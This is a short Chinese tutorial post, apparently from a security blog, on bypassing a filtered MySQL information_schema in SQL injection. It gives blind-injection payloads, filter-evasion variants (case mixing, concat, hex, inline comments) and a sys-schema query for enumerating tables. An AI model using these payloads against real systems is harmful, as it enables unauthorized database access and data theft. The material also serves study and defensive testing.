绕过information_schema库的一些方式

information_schema库的意义:

该数据库mysql其实是个信息数据库,保存着mysql服务器所维护的所有其他数据库信息,所以里面包含了数据库名,表名,字段名等,因此,information_schema 的重要性就在这三点上了,而如果information_schema库被过滤掉了,就只能通过其他方式来处理了。

绕过方式:

1、使用盲注猜测信息:

可以使用布尔盲注、时间盲注,对数据库信息进行猜测(因为是猜测,所以可能需要大量尝试,所以推荐使用脚本解决)

布尔盲注

复制代码
' and ascii(substr(database(), 1, 1))=97 --

时间盲注:

复制代码
 ' AND IF(SUBSTR(database(),1,1)='a', SLEEP(0.5), 0) -- 

2、尝试混淆源信息:

  • 修改大小写(我不看好)

    复制代码
    iNformaTIOn_schEma
  • 使用字符串进行拼接:

    复制代码
     concat('in','formation_schema')
  • 将其转换为16进制:

    复制代码
    696e666f726d6174696f6e5f736368656d61
  • 使用内连注释:

    复制代码
    SELECT table_name FROM /*!information_schema*/.tables WHERE table_schema=DATABASE();

3、使用其他库:

  • 使用sys数据库(5.7以上)

    sql 复制代码
    SELECT table_name FROM sys.schema_auto_increment_columns;      --获取所有表名	
相关推荐
hz567892 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung52 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
卓豪终端管理4 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学6 小时前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
GEO_youxuan9 小时前
2026年儿童电话手表推荐:定位精度、通话安全与健康监测深度横评
安全
数据知道9 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
doiito11 小时前
【安全,架构】RustyVault 项目深度分析报告以及和HashiCorp Vault的差异
后端·安全·rust
ylscode20 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
DianSan_ERP21 小时前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化
搭贝1 天前
低代码平台构建EHS环境健康安全管理系统:从隐患排查到合规审计的全流程实操指南
安全·低代码